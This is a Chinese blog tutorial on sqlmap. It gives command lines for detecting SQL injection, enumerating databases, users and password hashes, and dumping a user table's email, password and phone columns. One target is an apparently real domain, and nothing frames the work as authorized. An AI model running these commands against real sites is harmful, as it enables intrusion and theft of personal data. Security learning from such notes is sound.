渗透神器sqlmap的使用笔记

最新推荐文章于 2024-07-31 12:07:52 发布
最新推荐文章于 2024-07-31 12:07:52 发布
阅读量8.7k 收藏 15
点赞数 1
分类专栏: 应用安全 文章标签: sql注入 漏洞 数据
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29277155/article/details/51149891
版权

0x00前言

sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。该开源软件是国外大神的慷慨赠予。在乌云、补天等等漏洞公开平台,随处可见它的身影,也是渗透人员的必备神器。能够把这神器灵活运用,也是很厉害的一件事情。熟能生巧!!

下载地址:https://github.com/sqlmapproject/sqlmap#最快的使用,不过有点麻烦咯

集成环境:http://pan.baidu.com/s/1hssCKQS#Appie 里面安装了sqlmap

集成系统:https://www.kali.org/downloads/#kali-linux下安装有sqlmap

0x01 发现注入点

强调:sqlmap 并不擅长发现注入点,所以必须通过其他方式发现注入点。这些方式有:使用AWVS 进行漏扫、APPSCAN漏扫、burpsuite进行检测、手工挖掘(经验很重要),因为本文重点是介绍在发现注入点之后的工作,所以不对如何发现注入点进行详细介绍。我们需要使用txt文本来记录下注入点的地址和数据。作为后面参数的输入。

0x02 检测注入点

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent

 

实践1 : 因为众多的原因,测试过程会出现很多的 “  [Y/n]  ” 之类的提示。我们可以附加参数 --batch

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --random-agent --batch

实践2 :为了加快速度和增加检测的多样性

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" --data="item=1" --level=5 --risk=3 --ignore-proxy --delay=2 --timeout=60 --threads=6

实践3:进行表单数据注入

sqlmap -u "http://www.XXX.cn/admins" --forms 

实践4:当我们进行手机服务端的注入时

sqlmap -u "http://www.ahujhc.cn:80/ldxx/ldxx.php?pid=7" --mobile --time-sec=30

实践5:使用文本导入数据

sqlmap -r E:\temporary\www.XXX.cn.txt  --random-agent --batch --level=3 --risk=3  --timeout=60 --threads=3 --ignore-proxy --delay=2

0x03 暴力破解数据库名称和数目

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3

 

实践1: 可以附加的参数为: --union-cols=1-30 --union-char=NULL,CHAR

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --dbs --thread=3 --union-cols=1-30 --union-char=NULL,CHAR

实践2:列出web当前使用的数据库

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --current-db

实践3:尽可能详细的信息

 sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" -b --current-db --privileges --is-dba --current user --roles --users --hostname --passwords --comments -v 0

 

0x04 暴力破解一个数据库中的所有表

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 --tables

0x05 读取某个数据库中个某表的所有列

$ sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user --columns

0x06 读取列中的具体内容

sqlmap -u "http://www.XXX.cn/ldxx/ldxx.php?pid=7" --thread=6 -D jhxy2 -T web_user -C "Email,Password,Tel,Uname,Username" --dump

 

实践1 :如果数据过大,可以抽取一部分数据

sqlmap -u "http://www.XXX.cn:80/ldxx/ldxx.php?pid=7" -D jhxy2 -T web_user -C" Email,Password,Tel,Uname,Username"  --start=1 --stop=10 --dump

 

 

煜铭2011
关注
专栏目录
[网络安全自学篇] 三十九.hack the box渗透之DirBuster扫描路径及Sqlmap高级注入用法(三)
杨秀璋的专栏
01-15 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台注册过程,以及Web渗透三道入门题目,包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。这篇文章将通过两个题目分享DirBuster扫描目录、Fuzzy爆破指定路径名称,通过Sqlmap工具实现SQL注入并获取管理员用户名和密码、文件下载等用法。希望您喜欢~
网络安全技术方面渗透测试入门笔记
helloyouj的博客
07-26 1万+
一、网站基础与信息收集 http://192.168.80.128/shownnew.asp?id=16 访问的是网站中的那个网页? shownews.asp 这是一个静态还是动态网页? asp脚本程序写的 静态网页:内容固定不变,文件扩展名通常为。html、.htm\.shtml 动态网页:可以与后台数据库进行交互和数据库传递。同一个网页文件能工具不同的请求 显示
转载—sqlmap在https情况下的一个错误
12306小哥
06-15 3774
对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。 [14:19:03] [CRITICAL] can’t establish SSL connection 解决方法一: python sqlmap.py -u https://www.xxxx.com/?id=2* --level 5 --risk 3 --dbms MYSQL --tamper=between,bluecoat,charencode,charunicodeencode,equaltolike,great
sqlmap [CRITICAL] can‘t establish SSL connection
m0_54981229的博客
09-12 1664
因为网站是https的,需要ssl证书书,有的网站遇到这种情况就没法跑。有几种解决办法,我采用了如下办法解决。先加个 –-force-ssl参数,再加上bp(或者其他)的代理。sqlmap碰见了如下错误。bp可以看到测试记录。
WEB渗透Web突破篇-SQL注入SQLMAP
最新发布
qq_59468567的博客
07-31 1426
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -p 指定注入点,注入参数 --user-agent 指定user-agent --random-agent 随机user-agent
sqlmap在https情况下的一个错误
凡宇
07-15 5045
对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。 [14:19:03] [CRITICAL] can’t establish SSL connection 对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。 [14:19:03] [CRITICAL] can’t establish SSL connection 使用代理中...
问题解决:Unable to establish SSL connection.
看,未来的博客
06-06 3529
1、加上跳过验证证书的参数“–no-check-certificate” 2、有些网站不允许通过非浏览器的方式进行下载,使用代理既可以解决问题,加上代理的参数: –user-agent=“Mozilla/5.0 (X11;U;Linux i686;en-US;rv:1.9.0.3) Geco/2008092416 Firefox/3.0.3”...
实战sqlmap绕过WAF
zkaqlaoniao的博客
10-26 3975
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxx..
SQLMAP
xiaomengxin70的博客
05-28 1766
SQLmap简介: sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB sqlmap五种不同的注入模式:
网络渗透笔记
xinxijishu2的博客
04-07 678
Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL,SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 Sqlmap安装 LLI. (1)安
vulnhub靶机AI-Web-1.0渗透笔记
liver100day的博客
06-10 2352
AI-Web1靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:192.168.75.134 1.2 端口扫描 使用端口扫描神器nmap进行扫描 nmap -T4 -sV -O -A -P- 192.1
当wget 出现 Unable to establish SSL connection和Can’t connect to HTTPS URL because the SSL module is not
qq_43213352的博客
12-11 640
当你使用wget出現 Unable to establish SSL connection 這時你需要安裝: # sudo apt-get install libssl-dev 当使用wget出現 Can’t connect to HTTPS URL because the SSL module is not available 你需要安裝: # sudo apt-get install openssl ...
sqlmap中转注入
Anonymous
01-14 2178
使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
linux:Unable to establish SSL connection
Wu Shenshen的博客
07-14 3万+
在Linux下安装各种软件最常用的命令自然是wget https://xxxxxxxx 。本人今天安装QIIME2软件,在使用wget下载时报错:多方查阅资料,所有人给出的建议都是一模一样的:wget的版本过低,建议更新wget版本。但是我确实更新过wget版本了,依旧有这个报错          #更新wget的命令为:yum update wget最后的解决方案是,我抱着侥幸心理换了一台服务器...
Unable to establish SSl connection
ora_db的博客
01-09 7582
问题:Centos8.0.1905 使用wget 提示 GnuTLS: Error in the pull function. Unable to establish SSL connection. 解决方法: wget 使用 –no-check-certificate 参数 curl 使用 -k或者--insecure 参数 感谢:https://blog.csdn.ne...
关于服务器ssl配置以后,https无法访问的问题
热门推荐
lian_zhihui1984的专栏
02-29 6万+
通常在项目里,如果要用到ssl的话,一般都是自己先做个免费的证书在开发的过程中用的。等到上线了才去花钱买ssl证书。 这一回,自制了证书,在apache里也配置好后,始终无法通过https访问。调查步骤如下 step1. 确认apache配置。 httpd.conf里,查看mod_ssl.so和httpd-ssl.conf配置。如果没有mod_ssl.so的话,通过apach
Can't establish HTTP connection when consuming webservice
jl19880317的专栏
11-20 542
When registering in Consume Web Service Wizard, flowing error appeared: Go to integrationgateway.properties file which is in your webserv directory.search for secureFileKeystorePasswd.   Then
SQLMap渗透测试指南:使用与tamper脚本解析
"该资源为一个关于sqlmap的PPT介绍,主要讲解了如何使用sqlmap这个渗透测试工具,特别是它的-tamper选项以及在Burp Suite中的应用。" SQLMap是一个广泛使用的开源渗透测试工具,专门针对SQL注入漏洞进行自动化检测...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值